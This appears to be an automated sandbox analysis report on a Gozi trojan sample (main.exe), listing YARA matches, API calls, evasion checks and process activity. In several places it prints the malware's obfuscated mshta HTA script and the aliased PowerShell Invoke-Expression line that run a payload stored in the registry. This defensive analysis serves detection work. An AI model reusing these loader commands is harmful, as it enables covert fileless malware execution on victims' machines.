                Source: 00000000.00000002.507621836.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000002.507621836.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000000.00000003.470931903.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000003.470931903.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000000.00000003.379164621.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000003.379164621.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000000.00000003.453248169.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000003.453248169.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000000.00000003.379115531.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000003.379115531.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000000.00000003.379275340.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000003.379275340.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000000.00000003.379360683.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000003.379360683.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000000.00000003.484013460.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000003.484013460.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000000.00000003.379342148.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000003.379342148.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: Process Memory Space: main.exe PID: 6012, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: Process Memory Space: main.exe PID: 6012, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 2620, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: C:\Users\user\Desktop\main.exe Code function: 0_2_006D82FC
                Source: C:\Users\user\Desktop\main.exe Code function: 0_2_006D2DCC
                Source: C:\Users\user\Desktop\main.exe Code function: 0_2_006D2792
                Source: C:\Users\user\Desktop\main.exe Code function: 0_2_00401493 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
                Source: C:\Users\user\Desktop\main.exe Code function: 0_2_00401D95 GetProcAddress,NtCreateSection,memset,
                Source: C:\Users\user\Desktop\main.exe Code function: 0_2_00401F78 NtMapViewOfSection,
                Source: C:\Users\user\Desktop\main.exe Code function: 0_2_006D737C NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                Source: C:\Users\user\Desktop\main.exe Code function: 0_2_006D8521 NtQueryVirtualMemory,
                Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                Source: main.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: main.exe Virustotal: Detection: 61%
                Source: C:\Users\user\Desktop\main.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknown Process created: C:\Users\user\Desktop\main.exe C:\Users\user\Desktop\main.exe
                Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>W6wy='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(W6wy).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fuuocwpse -value gp; new-alias -name aedsorw -value iex; aedsorw ([System.Text.Encoding]::ASCII.GetString((fuuocwpse "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\main.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gmpv3qo3.pur.ps1
                Source: classification engine Classification label: mal100.troj.winEXE@5/2@3/1
                Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                Source: C:\Users\user\Desktop\main.exe Code function: 0_2_006D7256 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2368:120:WilError_01
                Source: C:\Users\user\Desktop\main.exe File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                Source: C:\Users\user\Desktop\main.exe Code function: 0_2_006DB859 push 0000006Fh; retf
                Source: C:\Users\user\Desktop\main.exe Code function: 0_2_006D82EB push ecx; ret
                Source: C:\Users\user\Desktop\main.exe Code function: 0_2_006D7F00 push ecx; ret
                Source: C:\Users\user\Desktop\main.exe Code function: 0_2_0040134F LoadLibraryA,GetProcAddress,

                Hooking and other Techniques for Hiding and Protection

                Source: Yara match File source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000003.379244595.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000003.470931903.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000003.379164621.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000003.453248169.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000003.379115531.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000003.379275340.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000003.379360683.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000003.379342148.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000003.484040297.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: main.exe PID: 6012, type: MEMORYSTR
                Source: Yara match File source: 0.2.main.exe.6d0000.1.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.main.exe.cb94a0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.3.main.exe.14294a0.1.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.3.main.exe.1455948.2.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.3.main.exe.13aa4a0.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.3.main.exe.1455948.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.3.main.exe.13aa4a0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.3.main.exe.14294a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000000.00000002.506994526.000000000112F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000002.506557066.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000003.470843781.0000000001429000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000003.470798619.00000000013AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\main.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1412 Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Users\user\Desktop\main.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9567
                Source: C:\Users\user\Desktop\main.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
                Source: C:\Users\user\Desktop\main.exe Process information queried: ProcessInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: main.exe, 00000000.00000002.505973511.0000000000796000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000002.506263326.00000000007DE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: main.exe, 00000000.00000002.506263326.00000000007DE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW,
                Source: C:\Users\user\Desktop\main.exe Code function: 0_2_0040134F LoadLibraryA,GetProcAddress,
                Source: unknown Process created: C:\Windows\System32\mshta.exe c:\windows\system32\mshta.exe" "about:<hta:application><script>w6wy='wscript.shell';resizeto(0,2);eval(new activexobject(w6wy).regread('hkcu\\\software\\appdatalow\\software\\microsoft\\54e80703-a337-a6b8-cdc8-873a517cab0e\\\testlocal'));if(!window.flag)close()</script>
                Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" new-alias -name fuuocwpse -value gp; new-alias -name aedsorw -value iex; aedsorw ([system.text.encoding]::ascii.getstring((fuuocwpse "hkcu:software\appdatalow\software\microsoft\54e80703-a337-a6b8-cdc8-873a517cab0e").urlsreturn))
                Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fuuocwpse -value gp; new-alias -name aedsorw -value iex; aedsorw ([System.Text.Encoding]::ASCII.GetString((fuuocwpse "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Users\user\Desktop\main.exeCode function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_006D54EC cpuid
                Source: C:\Users\user\Desktop\main.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00401A49 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_004012B0 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_006D54EC RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

                Stealing of Sensitive Information

                Source: Yara matchFile source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379244595.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.470931903.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379164621.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.453248169.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379115531.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379275340.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379360683.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379342148.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.484040297.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: main.exe PID: 6012, type: MEMORYSTR
                Source: Yara matchFile source: 0.2.main.exe.6d0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.main.exe.cb94a0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.14294a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.1455948.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.13aa4a0.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.1455948.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.13aa4a0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.14294a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.506994526.000000000112F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.506557066.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.470843781.0000000001429000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.470798619.00000000013AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                Source: Yara matchFile source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379244595.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.470931903.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379164621.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.453248169.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379115531.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379275340.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379360683.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379342148.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.484040297.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: main.exe PID: 6012, type: MEMORYSTR
                Source: Yara matchFile source: 0.2.main.exe.6d0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.main.exe.cb94a0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.14294a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.1455948.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.13aa4a0.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.1455948.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.13aa4a0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.14294a0.1.raw.unpack, type: UNPACKEDPE
